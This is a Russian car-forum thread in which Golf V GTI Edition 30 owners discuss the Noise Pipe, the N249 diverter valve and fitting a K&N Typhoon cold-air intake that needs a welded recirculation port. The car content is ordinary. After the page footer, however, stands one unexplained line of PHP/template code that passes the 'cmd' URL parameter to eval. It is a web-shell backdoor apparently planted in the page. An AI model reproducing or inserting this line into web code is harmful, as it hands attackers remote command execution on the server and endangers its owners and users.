+ Ответить в теме
Страница 1 из 14 1 2 3 11 ... ПоследняяПоследняя
Показано с 1 по 10 из 132

Тема: GTI V Noise Pipe...модернизация и установка холодного впуска K&N


  1. #1
    GTI-Racing Max is on a distinguished road Аватар для Max
    Регистрация
    24.08.2007
    Откуда
    Москва
    Машина
    VW Golf V GTI Edition 30
    Сообщений
    1,406

    GTI V Noise Pipe...модернизация и установка холодного впуска K&N

    Оказывается, в Edition 30 изменена схема рециркуляции впуска:
    клапан рецеркуляции N249 сбрасывает излишки в тот самый злосчастный Noise Pipe, который по-хорошему надо бы убирать из системы.

    Изменение:
    В Noise Pipe не сбрасываются излишки, он служит трубопроводом для воздуха сжатого турбиной к клапану N249. Чтобы выбросить Noise Pipe, нужно перенести клапан к трубе интеркулера, к тому месту где к ней конектится Noise Pipe, заодно сократится объем демпфирующего воздуха. Длина и плотность трубы от клапана до сброса практически не будет играть никакой роли.



    Крупнее:


    N249 установлен на Edition 30 прямо под Noise Pipe на файерволе - резиновый патрубок, который хорошо видно на второй фотографии идет как раз к клапану рециркуляции.
    Последний раз редактировалось Max; 07.06.2009 в 13:11.
    Совершить невозможное - не такая уж великая проблема, если знаешь с чего начать... (с) Max Frei

  2. #2
    <div class='quotetop'>Цитата(Max &#064; Dec 4 2008, 11&#58;52) <{POST_SNAPBACK}></div><div class='quotemain'>Оказывается, в Edition 30 изменена схема рециркуляции впуска:
    клапан рецеркуляции N249 сбрасывает излишки в тот самый злосчастный Noise Pipe, который по-хорошему надо бы убирать из системы.



    Крупнее:


    N249 установлен на Edition 30 прямо под Noise Pipe на файерволе - резиновый патрубок, который хорошо видно на второй фотографии идет как раз к клапану рециркуляции.

    В связи с чем хочу спросить - кто знает где у обычного V GTI стоит N249 и куда он там сбрасывается воздух?[/b][/quote]
    у тебя так же как и на обычном носке&#33;
    у меня вот по другому

  3. #3
    Да нет Эдик. Как раз на обычном нету этого резинового патрубка под Noise Pipe. Мне кажется принцип работы у вас одинаковый, когда перепускник избыток воздуха стравливает обратно во впуск, просто у тебя через твою резиновую трубку которую ты врезал в впуск, а у него через Noise Pipe. Могу и ошибаться.

  4. #4
    GTI-Racing Max is on a distinguished road Аватар для Max
    Регистрация
    24.08.2007
    Откуда
    Москва
    Машина
    VW Golf V GTI Edition 30
    Сообщений
    1,406
    Цитата Сообщение от Ludacris
    Да нет Эдик. Как раз на обычном нету этого резинового патрубка под Noise Pipe. Мне кажется принцип работы у вас одинаковый, когда перепускник избыток воздуха стравливает обратно во впуск, просто у тебя через твою резиновую трубку которую ты врезал в впуск, а у него через Noise Pipe. Могу и ошибаться.
    все верно. на обычном V GTI N249 воздух сбрасывает куда-то в другое место - нойз пайп там голый, без дополнительного писюна.
    Последний раз редактировалось Max; 01.06.2010 в 10:17.
    Совершить невозможное - не такая уж великая проблема, если знаешь с чего начать... (с) Max Frei

  5. #5
    GTI-Racing Max is on a distinguished road Аватар для Max
    Регистрация
    24.08.2007
    Откуда
    Москва
    Машина
    VW Golf V GTI Edition 30
    Сообщений
    1,406
    В конце января приехал мне впуск K&N Typhoon
    http://www.knfilters.com/search/prod...rod=69-9503TFK



    Времени его поставить не было, но не заглянуть под капот, чтобы выяснить чего там и как откручивать/прикурчивать я не мог.
    И вот что выяснилось: этот кит (как и любой другой предназначенный для V GTI) просто так на E30 поставить нельзя - во впускном патрубке, который идет от крышки двигателя к турбине (он крепится металическими клипсами рядом с датичком объема воздуха) есть писюн, куда стравливается избыток воздуха после интеркулера. То есть Noise Pipe собственно и есть та труба по которой избыток давления через DV-клапан стравливается обратно во впуск перед турбиной.
    Сам клапан стоит у меня старый 6F 145 710 G и висит прямо под Noise Pipe.


    А вот так выглядит впускной патрубок который находится между крышкой двигателя и турбиной
    Последний раз редактировалось Max; 01.06.2010 в 10:22.
    Совершить невозможное - не такая уж великая проблема, если знаешь с чего начать... (с) Max Frei

  6. #6
    Жгун Года 2010 КИБАЛЬЧИШЬ is a jewel in the rough КИБАЛЬЧИШЬ is a jewel in the rough КИБАЛЬЧИШЬ is a jewel in the rough КИБАЛЬЧИШЬ is a jewel in the rough Аватар для КИБАЛЬЧИШЬ
    Регистрация
    14.04.2008
    Сообщений
    2,346
    Извини Ген не понял что является препятствием,
    можно поподробнее для близарукех...

  7. #7
    GTI-Racing Max is on a distinguished road Аватар для Max
    Регистрация
    24.08.2007
    Откуда
    Москва
    Машина
    VW Golf V GTI Edition 30
    Сообщений
    1,406
    Цитата Сообщение от КИБАЛЬЧИШЬ
    Извини Ген не понял что является препятствием,
    можно поподробнее для близарукех...
    Труба которая в ките - прямая (просто фильтр, просто труба с датчегом и все), а нужно чтобы в ней был писюн сбоку перед турбиной для подключения шлнага от DV-клапана, который стравливает лишнее давление обратно. Проблемы особой нет - надо просто вварить этот писюн в трубу. Я съездил в Турбомоторс, где сосбтвенно все сняли измерили, а я за одно и пофоткал, но у них не нашлось алюминиевой трубы нужного диаметра - обычно на клапанах стоит трубка 24 мм, а на Е30 патрубки под 30 мм трубы. В общем надо найти подходящую трубку и вварить.

    P.S. Посмотри на фотку Эдика - там видно что к трубе впускной идет шланг - на обычном GTI этого шланга, и соответственно писюна к которому он побрубается, нет.
    Последний раз редактировалось Max; 01.06.2010 в 10:24.
    Совершить невозможное - не такая уж великая проблема, если знаешь с чего начать... (с) Max Frei

  8. #8
    Жгун Года 2010 КИБАЛЬЧИШЬ is a jewel in the rough КИБАЛЬЧИШЬ is a jewel in the rough КИБАЛЬЧИШЬ is a jewel in the rough КИБАЛЬЧИШЬ is a jewel in the rough Аватар для КИБАЛЬЧИШЬ
    Регистрация
    14.04.2008
    Сообщений
    2,346
    <div class='quotetop'>Цитата(Max &#064; Feb 14 2009, 12&#58;58) <{POST_SNAPBACK}></div><div class='quotemain'>Труба которая в ките - прямая (просто фильтр, просто труба с датчегом и все), а нужно чтобы в ней был писюн сбоку перед турбиной для подключения шлнага от DV-клапана, который стравливает лишнее давление обратно. Проблемы особой нет - надо просто вварить этот писюн в трубу. Я съездил в Турбомоторс, где сосбтвенно все сняли измерили, а я за одно и пофоткал, но у них не нашлось алюминиевой трубы нужного диаметра - обычно на клапанах стоит трубка 24 мм, а на Е30 патрубки под 30 мм трубы. В общем надо найти подходящую трубку и вварить. [img]style_emoticons/<#EMO_DIR#>/smile.gif[/img][/b][/quote]

    Ну вот у него и патрубки больше и турбина и кулер... [img]style_emoticons/<#EMO_DIR#>/dribble.gif[/img]
    Чувствую себя обездоленным

  9. #9
    GTI-Racing Max is on a distinguished road Аватар для Max
    Регистрация
    24.08.2007
    Откуда
    Москва
    Машина
    VW Golf V GTI Edition 30
    Сообщений
    1,406
    Цитата Сообщение от КИБАЛЬЧИШЬ Посмотреть сообщение
    Ну вот у него и патрубки больше и турбина и кулер...
    Чувствую себя обездоленным
    жжете, Алексей!
    Но кулеры у нас с Вами одинаковыя!
    Последний раз редактировалось Max; 01.06.2010 в 10:25.
    Совершить невозможное - не такая уж великая проблема, если знаешь с чего начать... (с) Max Frei

  10. #10
    нужна дырка в другом месте&#33; все так-же надо сделать как и у меня только в другом месте)

    на фото там где желтый круг у меня сделана дырка, а тебе надо её мутить там где я отметил красным. думаю все таким же образом.

+ Ответить в теме
Страница 1 из 14 1 2 3 11 ... ПоследняяПоследняя

Похожие темы

  1. Отчет Об Установке Холодного Впуска Evoms И Вспрыска Метанола Snow Performance
    от umidka в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 20
    Последнее сообщение: 05.10.2023, 06:09
  2. Особенности установки холодного впуска на 2.0Т
    от serzh1 в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 47
    Последнее сообщение: 02.10.2023, 06:07
  3. CTS Down pipe GTI Mk6
    от Rugby 14 в разделе Тюнинг
    Ответов: 12
    Последнее сообщение: 16.09.2014, 16:31
  4. Комплект Noise Pipe Delete Kit для R32
    от Bahus в разделе Покупка и продажа запчастей
    Ответов: 3
    Последнее сообщение: 02.05.2013, 11:26
  5. Поставил систему холодного впуска
    от nickart в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 85
    Последнее сообщение: 17.08.2008, 00:11

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}